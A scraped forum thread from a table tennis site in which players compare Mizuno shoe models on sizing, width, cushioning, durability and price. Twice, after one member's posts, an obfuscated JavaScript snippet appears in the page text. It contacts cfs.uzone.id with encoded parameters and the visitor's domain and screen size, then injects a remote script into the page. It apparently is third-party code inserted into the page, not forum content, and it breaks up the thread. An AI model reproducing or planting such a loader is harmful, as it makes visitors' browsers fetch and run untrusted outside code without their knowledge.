FAQ FAQ  Forum Search   Events   Register Register  Login Login
tabletennis11.com

Mizuno shoes

Post Reply Post Reply Page  12>
Author
aeoliah View Drop Down
Premier Member
Premier Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote aeoliah Quote  Post ReplyReply Direct Link To This Post Topic: Mizuno shoes
    Posted: 04/19/2017 at 12:06am
Which one is better between:

Mizuno Wave Lightning
Mizuno Wave Drive Z
Mizuno Wave Medal SP3
Mizuno Wave Drive 8.

Currently I am using Mizuno Wave Lightning. Is any of the above worth buying considering I have already the Wave Lightning ?

Thanks
Member of the Single Ply Hinoki Club
Viscaria Super ALC C-Pen
Rasanter C48

Sponsored Links

LNH View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote LNH Quote  Post ReplyReply Direct Link To This Post Posted: 04/19/2017 at 12:33am
I do owned Wave Drive Z shoe.  It is the highend tt shoe from mizuno WAVE DRIVE series.  Afew of my freinds owned that shoe and they are happy with the quality.

Wave Medal SP3 is the high end of the WAVE MEDAL series, somehow this tt shoe is not popular as most customers prefer to buy tt shoe with shoe lace instead of using the twisting technology.

Wave drive 8 is another mid range of of the WAVE  DRIVES series.  Is a good and affordable shoe.  I did owned a wave drive 6 two years ago.

Personally, I wont recommend to buy wave lighting shoe as this shoe is strictly for volleyball and  not specially made for table tennis.  I believed Mizuno company manufactured shoes according to their function.
mts388 View Drop Down
Platinum Member
Platinum Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote mts388 Quote  Post ReplyReply Direct Link To This Post Posted: 04/19/2017 at 12:51am
I like the wave bolt 5.  I bought wave lightning 3 weeks ago and they hurt my feet so much that I can't wear them.
Basquests View Drop Down
Silver Member
Silver Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote Basquests Quote  Post ReplyReply Direct Link To This Post Posted: 04/27/2017 at 5:09am
I have the Wave Medal 5's. Fantastic shoes, that are a bit wider, INCREDIBLY durable [I deem my feet shoe killers. They ravage shoes] but they are getting difficult to find for a reasonable price, which is perhaps why they aren't as an option in your list.

TT11 told me they'll have a couple of sizes in a final shipment next week but I'm a bit strapped as a student seeing as i just dumped some money on badminton stuff etc - i was using them for 5~ hours of badminton a week, plus table tennis, for around 8 months and they are still going strong [for comparison, i haven't had a pair of runners that don't look completely shot after 1 year], which is another reason why I don't want to buy them - i don't need them yet.

Anyone know if there's gonna be a Medal 6 this year or something?? The Wave Drive's probably aren't for me, I don't want a more narrow pair of shoes that are notorious for being less durable.

Edited by Basquests - 04/27/2017 at 5:11am
LNH View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote LNH Quote  Post ReplyReply Direct Link To This Post Posted: 04/27/2017 at 5:18am
Mizuno will launch the WAVE MEDAL 6 most likely towards the end of the 2017.  Currently Mizuno do have the upgrade version of the wave medal 5 which the WAVE MEDAL Z.  You can checkout from the iruiru or tt-japan website.

if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssK%2fN%2fQL2G47QURsS91uguEA8N33ibJjPbMSvncm19tJ9Z%2fFSIpCOvua1PSSQs6W7g0MPvUh1LdYp1UrjiDtIYXGi23y2RZWpYiBQw9DnN7EirWBiWeMLx%2f2L%2bCX8x7N98AhLxPxb%2f7ps9yEEAwPuMqdgvbEyKV6LyLB8ujso0Q9Fq33SFiaCnwHbR95TTP%2fAKkmmTOfTSZbRPf2RS5N%2fs8J3oqLVqQNVKSX0K8WjeQfFVrAlVr9WV0aXG9ubjOy%2focFsodKnEIDtq%2bZ%2fsMkBG4L1VC0JJhFJHCi%2b%2bYcjfDuCXodQQhuIhXtr57ogI3K7fEuyQ51HmyOg3QtGTAPTniHCT0tTIwTWXLOOvaVOhBzTZTfFfbbDFl5HZzpoYTv0KyuC0fzn1x7vlvnhPtcCLK7Rbsz%2bLvaDzbCFAFqzYxxXIBK9T1g%2f9Wbgp%2fd%2bMmOcp36y9YOgsrPxo0802kuifB9%2bT%2b4wfw2vpX" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};
Basquests View Drop Down
Silver Member
Silver Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote Basquests Quote  Post ReplyReply Direct Link To This Post Posted: 04/27/2017 at 7:00pm
^Thanks. I discovered after the post that those Japanese sites have those shoes in stock and for a very good price, although that's completely mitigated by the shipping costs. 

I saw the Wave Medal Z and it'll cost around $115 US to get it shipped...pricey but I might be a nice b'day present for myself! Any idea on how it differs from the WM5?

Edited by Basquests - 04/27/2017 at 7:01pm
Chairman Meow View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote Chairman Meow Quote  Post ReplyReply Direct Link To This Post Posted: 04/27/2017 at 9:57pm
They are mostly synthetic instead of mesh, making them heavier. They are also a different colour. That is pretty much it, function wise they are the same. Same sole design, same grip. I would actually think they are slightly less desirable because of the increased weight and decreased ventilation due to the mostly synthetic material. All of non-standard versions of the medal 5 (medal SP3, Medal Ace) are the same as the standard, except they are heavier due to increased use of synthetics and (in SP3's case) a strange shoelace apparatus.

As a side note, my friend's wave drive Z's lasted much less long than his wave drive 8's. However, these shoes have more differences such as a slightly different sole design and (judging by the transparency of the Z's sole) sole thickness. However, the Medal 5 and Z look exactly the same, so this problem might not exist with them.

TT-Japan has a limited edition of the Medal 5 for sale, this is what I use. 
It is the same as the normal Wave Medal 5, just a different colour and with some slightly different graphics on the synthetic part. They are on sale, and cheaper than the normal Medal 5. However, they only come in 28.0 cm, so they may not fit you. They used to have multiple sizes, but that is all that is left.
-1 ply Cypress 11.5mm "The Castigator"
-H3 Prov. Blue Sponge 2.2mm 41 deg.
-H3 Prov. Orange Sponge 2.1mm 37 deg
LNH View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote LNH Quote  Post ReplyReply Direct Link To This Post Posted: 04/28/2017 at 12:22am
+ 1.

if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "¶ms=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKtWPHJXpMYpvSEX2tuYfglARy6cs4hqimYRMPzgJvXtgn67Vwx3eCLRSBFz1oqusBEpOKxJQbJDKpP%2byYygUrrAJbChuBUQEqXhNZgxGic58W8kl4ITjAfGkImon2qNk%2futjJ%2fZDjGB4rsHk%2fRX%2b89zZKy%2bD8bOht6xZ0HvXkxYKDYr3jqOT%2fyY%2bosjiVYz6zIA6a7797RSC7a%2f04XrtPiHk3koLskHAygChhWZAzis7NpF%2f%2bcT7ZDW96Y1aD0WE7SldMOBKgUXtbShWKqcpgZqTMu03fgroi%2bDaOIbRS2MDV4MSx6g10okBAF1D74089%2bEHaz4JtnB89t16rAxgHmg6xYU7l0MxKJkRmYgYWXg3PGRTmkfxZbUxhbaWzJqSXfYbIbNz6XPu1rW2eg8nVjUFJVH54VGB5jNbvsn7WVuHJMhy6pBBLcpd1ljrDHW3pz7CEjIl4CzEF%2fr8j0DG53Ac7lQrXfGhLI32PLPTjx0Ek7bxoRAzy9ThcfRV9LlDLDmu7oTNxuJNXeHW0S7NwT6MKbat3WZDODrPj2%2bzIcNmB2%2fRvIbCSnQ%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};
Basquests View Drop Down
Silver Member
Silver Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote Basquests Quote  Post ReplyReply Direct Link To This Post Posted: 04/28/2017 at 6:13am
Originally posted by Chairman Meow Chairman Meow wrote:

They are mostly synthetic instead of mesh, making them heavier. They are also a different colour. That is pretty much it, function wise they are the same. Same sole design, same grip. I would actually think they are slightly less desirable because of the increased weight and decreased ventilation due to the mostly synthetic material. All of non-standard versions of the medal 5 (medal SP3, Medal Ace) are the same as the standard, except they are heavier due to increased use of synthetics and (in SP3's case) a strange shoelace apparatus.

As a side note, my friend's wave drive Z's lasted much less long than his wave drive 8's. However, these shoes have more differences such as a slightly different sole design and (judging by the transparency of the Z's sole) sole thickness. However, the Medal 5 and Z look exactly the same, so this problem might not exist with them.

TT-Japan has a limited edition of the Medal 5 for sale, this is what I use. 
It is the same as the normal Wave Medal 5, just a different colour and with some slightly different graphics on the synthetic part. They are on sale, and cheaper than the normal Medal 5. However, they only come in 28.0 cm, so they may not fit you. They used to have multiple sizes, but that is all that is left.

Thanks for such an indepth answer. I'll consider getting the WD8's instead of the Medal5 / synthetic Medal Z when i pull the trigger in 2 or 3 months / earlier if I deal comes up in my size / how i feel about the shoes given the information I have about them.

I wasn't really considering the Drive Z's, but its good to be able to throw them out completely - they cost a fair chunk and if they aren't durable, that's even worse $ wise.

I saw those purple limited editions, they seem pretty cool, unfortunately I'm a 28.5 so they are probably too small [and getting your feet crushed over an 8am till 8pm tournament is probably a rare and unusual torture!] I've also had 1 shoe that's a 28.5 [futsal] that I can't wear, so one bitten twice shy- i think 28.0 is probably too small, even though the Medal 5's run a bit larger.

Does your friend think the WD8's are a good shoe apart from the durability? Despite being very recent releases, they are a bit cheaper than the older Medal 5's [and a lot cheaper than the synthetic Medal Z] respectively, which is obviously a consideration [ not to mention shipping adds 15 euro no matter the shoe]

They are difficult to procure outside of these japanese sites [dandoy don't sell mizuno, TT11 barely have any Mizuno recently] so its difficult to get an opinion on the Drive 8's, they are also reasonably new so they aren't that commonplace hence the request.

Plus your information on the Medal Z / Wave Drive Z is almost the first piece of info i'm getting on them, considering how they are editions that are only well stocked in these Japanese sites - not many reviews in English!

Edited by Basquests - 04/28/2017 at 6:18am

Post Options Post Options   Thanks (0) Thanks(0)   Quote Chairman Meow Quote  Post ReplyReply Direct Link To This Post Posted: 04/28/2017 at 11:12am
He likes the 8's so far, not many differences between them and the 7's. Note that the drives are narrower and have lower heels than the medals, those of us with wide feet may prefer the medals. The medal 5's also have ventilation on the sole, but I don't know if it really does anything.

I got lucky, I got the purple medal 5's when they were available in 28.5. They are huge, as big as the 30.5 street shoes (Adidas) that I wear. 

The drive series, from what I have seen, is slightly less durable than the medals. They also don't have the extra sole on the inside heel of the shoes that the medal has, which makes them slightly less effective if you are playing with a lot of bending and the extra grip on the side of the shoe helps there.
AndySmith View Drop Down
Premier Member
Premier Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote AndySmith Quote  Post ReplyReply Direct Link To This Post Posted: 04/28/2017 at 11:39am

He likes the 8's so far, not many differences between them and the 7's. Note that the drives are narrower and have lower heels than the medals, those of us with wide feet may prefer the medals. The medal 5's also have ventilation on the sole, but I don't know if it really does anything.

It definitely does something if you step in a puddle.

I love my Medal 5's.  Easily the best TT shoe I've had over the years.
This was a great signature until I realised it was overrated.
taczkid View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote taczkid Quote  Post ReplyReply Direct Link To This Post Posted: 04/28/2017 at 11:46am
I just got Wave Drive 8 and I like them a lot!
Basquests View Drop Down
Silver Member
Silver Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote Basquests Quote  Post ReplyReply Direct Link To This Post Posted: 04/28/2017 at 6:43pm

I got lucky, I got the purple medal 5's when they were available in 28.5. They are huge, as big as the 30.5 street shoes (Adidas) that I wear. 

The drive series, from what I have seen, is slightly less durable than the medals. They also don't have the extra sole on the inside heel of the shoes that the medal has, which makes them slightly less effective if you are playing with a lot of bending and the extra grip on the side of the shoe helps there.

Cheers, I think I'll stick with the medals then [I purposely picked them over the 7's because of the increased support + durability, wider [have wideish feet] when i ordered from tt11 eight or so months ago. The extra heel i didn't know about, but i do play with a lot of bending and such when looping [I'm in my early 20's], so i can afford to play with an energetic style.

Yeah, they do run large, however the 28.5 is still probably the best choice for me, even though i wear 28.5's in everything [Nike runners etc] - its amazing that it runs 2 full CM's larger compared to your street shoes! 

Edited by Basquests - 04/28/2017 at 6:45pm
pdotec View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote pdotec Quote  Post ReplyReply Direct Link To This Post Posted: 04/29/2017 at 9:12am
Originally posted by mts388 mts388 wrote:

I like the wave bolt 5.  I bought wave lightning 3 weeks ago and they hurt my feet so much that I can't wear them.

Agree totally.   Wave Bolt 2, most comfortable shoe.  Wave Lightning 2, I can't wear them at all!
The Wave Lightning is the more expensive shoe, but totally uncomfortable.  I also owned 2 pairs of
Wave Drives, but sold them ... didn't have enough support.  Wave Drives may be good for young,
super fast players  ... but older players may want more support.

Edited by pdotec - 04/29/2017 at 9:16am
DreiZ View Drop Down
Platinum Member
Platinum Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote DreiZ Quote  Post ReplyReply Direct Link To This Post Posted: 04/29/2017 at 10:24am
Im also looking to buy a pair of mizuno wave drive 7 or wave medal 5 shoes but dont know the size.

I wear 12.5 in nike/asics with a slightly wide foot. According to the chart i would need a 46 or 46.5? Do wave drive 7/wave medal 5 run large?

Also if anyone tried any of the above to compare with Asics Gel Rocket 7s, would appreciate it.

Edited by DreiZ - 04/29/2017 at 10:40am
Ovtcharov Innerforce ALC 85g
FH/BH: Glayzer 09C 2.1mm
USATT: 1725

Post Options Post Options   Thanks (0) Thanks(0)   Quote Chairman Meow Quote  Post ReplyReply Direct Link To This Post Posted: 04/29/2017 at 11:21am
A 12.5 in US sizes is a 30.5 in Japanese sises. The other numbers you listed are the European sizes.

Wave medal 5 runs large, I'd say about a centimetre. I've never tried the wave drive 7, but it probably also runs large because they are both Mizuno shoes. 

If your foot is wide, then the medal series would be better, because they are wider than the drives.
DreiZ View Drop Down
Platinum Member
Platinum Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote DreiZ Quote  Post ReplyReply Direct Link To This Post Posted: 04/29/2017 at 6:42pm
Correction, i wear Asics court shoes in size US12/EURO46.5/CM29.5. TT11 sells both shoes but WD7 comes in EURO45 and EURO46.5. Do you think Mizuno WD7 in size EURO45 fit better since it does run large?
Im more interested in WD7 than WM5 because of weight and upper material.
Basquests View Drop Down
Silver Member
Silver Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote Basquests Quote  Post ReplyReply Direct Link To This Post Posted: 04/29/2017 at 7:11pm
Originally posted by DreiZ DreiZ wrote:

Correction, i wear Asics court shoes in size US12/EURO46.5/CM29.5. TT11 sells both shoes but WD7 comes in EURO45 and EURO46.5. Do you think Mizuno WD7 in size EURO45 fit better since it does run large?

For some it runs a size large.

For me, I'd say it runs about 1/5th a size large [i.e. noticeably larger by a small amount than most shoes of the same size - big enough to notice, but not big enough to make them too large]. This also means if i'd gone 28.0, i'd probably want to murder my feet after playing.

I.e. I wear US 10.5 [28.5 CM] for all my shoes. Nike running etc. I cannot wear US 11s in any brand without feeling very awkward. I had to buy some cheap hiking shoes that are US11, and it doesn't feel good at all [They didn't have 10.5's, and if i hadn't bought them, i'd have to pay 4x as much in NZ].

I ordered the 28.5 CM Mizuno's. Don't get caught up in Euro size etc, just stick to CM because different brands have different Euro measurements. Seeing as these are Vietnamese shoes with strong links to Japan [that's where they are best stocked / all the limited editions are purchaseable] id stick to CM [JP = CM size]. They say 28.5 CM is EU 44, whereas all my nike's etc say 28.5 = 44.5.

Your feet are 1.5 sizes larger than mine in US [and 1 CM], so i'd. I'd try some nike running shoes and either buy the CM size that's on the nikes, or perhaps go 0.5 CM down when purchasing your Mizunos.

If your feet are wide, definitely go with the WM5's. Great support and more durable.

Also, in the Japanese websites, the WD7 is 54 EU, 60 for the WD8 [plus shipping] The WM 5 is 72 or so. So the WM5
are dearer [yet same price on TT11]. Why they are dearer is probably due to higher cost / more popularity [people willing to pay more for them]. So that's a consideration too.

Edited by Basquests - 04/29/2017 at 7:16pm
DreiZ View Drop Down
Platinum Member
Platinum Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote DreiZ Quote  Post ReplyReply Direct Link To This Post Posted: 04/29/2017 at 7:25pm
Originally posted by Basquests Basquests wrote:

Originally posted by DreiZ DreiZ wrote:

For some it runs a size large.

For me, I'd say it runs about 1/5th a size large [i.e. noticeably larger by a small amount than most shoes of the same size - big enough to notice, but not big enough to make them too large]. This also means if i'd gone 28.0, i'd probably want to murder my feet after playing.

I.e. I wear US 10.5 [28.5 CM] for all my shoes. Nike running etc. I cannot wear US 11s in any brand without feeling very awkward. I had to buy some cheap hiking shoes that are US11, and it doesn't feel good at all [They didn't have 10.5's, and if i hadn't bought them, i'd have to pay 4x as much in NZ].

I ordered the 28.5 CM Mizuno's. Don't get caught up in Euro size etc, just stick to CM because different brands have different Euro measurements. Seeing as these are Vietnamese shoes with strong links to Japan [that's where they are best stocked / all the limited editions are purchaseable] id stick to CM [JP = CM size]. They say 28.5 CM is EU 44, whereas all my nike's etc say 28.5 = 44.5.

Your feet are 1.5 sizes larger than mine in US [and 1 CM], so i'd. I'd try some nike running shoes and either buy the CM size that's on the nikes, or perhaps go 0.5 CM down when purchasing your Mizunos.

If your feet are wide, definitely go with the WM5's. Great support and more durable.

Also, in the Japanese websites, the WD7 is 54 EU, 60 for the WD8 [plus shipping] The WM 5 is 72 or so. So the WM5
are dearer [yet same price on TT11]. Why they are dearer is probably due to higher cost / more popularity [people willing to pay more for them]. So that's a consideration too.

I have nike running shoes US size 12.5 (CM 30.5) which fit me nicely, not too tight or too large. My feet measured in CM are 29.5 with socks on. Usually I give about 1cm space in the back (1 finger in between heel and heel of the shoe test while shoes are on) so its not too tight when i try on shoes.

Edited by DreiZ - 04/29/2017 at 7:30pm
aeoliah View Drop Down
Premier Member
Premier Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote aeoliah Quote  Post ReplyReply Direct Link To This Post Posted: 04/30/2017 at 11:24pm
So Chairman Meow, if I want a wide shoes I should not choose Wave Drive but I should take Wave Medal ?
Viscaria Super ALC C-Pen
Rasanter C48

Post Options Post Options   Thanks (0) Thanks(0)   Quote Chairman Meow Quote  Post ReplyReply Direct Link To This Post Posted: 05/01/2017 at 9:21am
Yes, but only if your feet are actually wide.
aeoliah View Drop Down
Premier Member
Premier Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote aeoliah Quote  Post ReplyReply Direct Link To This Post Posted: 05/02/2017 at 1:39am

Yes, but only if your feet are actually wide.

I asked iruiru, and they replied that Wave Drive and Wave Medal have the same width. This makes me confused.

Viscaria Super ALC C-Pen
Rasanter C48

Post Options Post Options   Thanks (0) Thanks(0)   Quote Chairman Meow Quote  Post ReplyReply Direct Link To This Post Posted: 05/02/2017 at 2:02pm
This is just my (and other people's) personal experience.
pdotec View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote pdotec Quote  Post ReplyReply Direct Link To This Post Posted: 05/04/2017 at 11:40am
Originally posted by aeoliah aeoliah wrote:

So Chairman Meow, if I want a wide shoes I should not choose Wave Drive but I should take Wave Medal ?

table tennis shoes are unisize
court shoes come in mens and womens sizes
so generally speaking mens court shoes would be the most wide ....
DreiZ View Drop Down
Platinum Member
Platinum Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote DreiZ Quote  Post ReplyReply Direct Link To This Post Posted: 05/05/2017 at 4:13pm
I received a pair of Mizuno Wave Drive 7 in US12.5/EU46.5/JP30.5 and it does run big, way too big in length... The width is good though. My feet are slightly wide and they are comfortable. It runs more like a Size US13-13.5 in NIKE/ASICS. Top quality shoe, very nice soft upper material. Im trying to sell them here if anyone is interested check out the FS section, otherwise its going back for a refund. 
unstopabl3 View Drop Down
Silver Member
Silver Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote unstopabl3 Quote  Post ReplyReply Direct Link To This Post Posted: 09/30/2017 at 5:49pm

This is just my (and other people's) personal experience.

I tend to injure my thumb toe near the nail area and also get scratched in the back of my foot above the heel area. I've used a few shoes over the years which have this weird plastic material at the back of the shoe above the heel area which after wear and tear tends to stick out of the cloth material and start scratching the area above my heel.

So would Wave Medal 5 suit me best if I want comfort in the front and back of my feet (toes & area above heel) and good cushion in the heel area as I do hard steppings and tend to land hard on my heel. Also I have wide feet. Or would you suggest I go for ASICS Gel Rocket 7 considering there is not much of a price difference between the two.

Thanks
col6628 View Drop Down

Post Options Post Options   Thanks (0) Thanks(0)   Quote col6628 Quote  Post ReplyReply Direct Link To This Post Posted: 10/01/2017 at 4:37am
yonex, badminton squash  table tennis awesome make sure 1/2 big.
Kolev View Drop Down
Gold Member
Gold Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote Kolev Quote  Post ReplyReply Direct Link To This Post Posted: 10/01/2017 at 5:30am
I tried some Yonex badminton shoes and really liked the comfort. Very nice cushion, steady and the best grip I've seen. My next shoes probably will be Yonex. Currently I am using wave medal 5 and asics blade 4.
Hallmark Carbon Extreme (x3)
FH: D05/G1/RX
BH: Z2/D64/Ω7Pro
unstopabl3 View Drop Down
Silver Member
Silver Member

Post Options Post Options   Thanks (0) Thanks(0)   Quote unstopabl3 Quote  Post ReplyReply Direct Link To This Post Posted: 10/01/2017 at 2:31pm
Originally posted by Kolev Kolev wrote:

I tried some Yonex badminton shoes and really liked the comfort. Very nice cushion, steady and the best grip I've seen. My next shoes probably will be Yonex. Currently I am using wave medal 5 and asics blade 4.

Can you please read my last post and answer the specific points I asked about Wave Medal 5? I just want to make sure they will be highly comfortable before spending $100.

Thanks
Kolev View Drop Down
Gold Member
Gold Member

Post Options Post Options   Thanks (1) Thanks(1)   Quote Kolev Quote  Post ReplyReply Direct Link To This Post Posted: 10/01/2017 at 3:50pm
Sorry, didn't see your previous one..Wave medal 5 are steady and very good looking shoes with good support for lateral moves . If you are looking for a really nice cussion under your heels you won't find it here, but if you have wider feet they may be a match for you. I have two pair of these, but I don't think this high price is justified. Rocket 7 has better cussion ,the soles are thicker so you would feel a bit taller, which you may like or maybe not... I like to have lower stance
Hallmark Carbon Extreme (x3)
FH: D05/G1/RX
BH: Z2/D64/Ω7Pro
 Post Reply Post Reply Page  12>
  Share Topic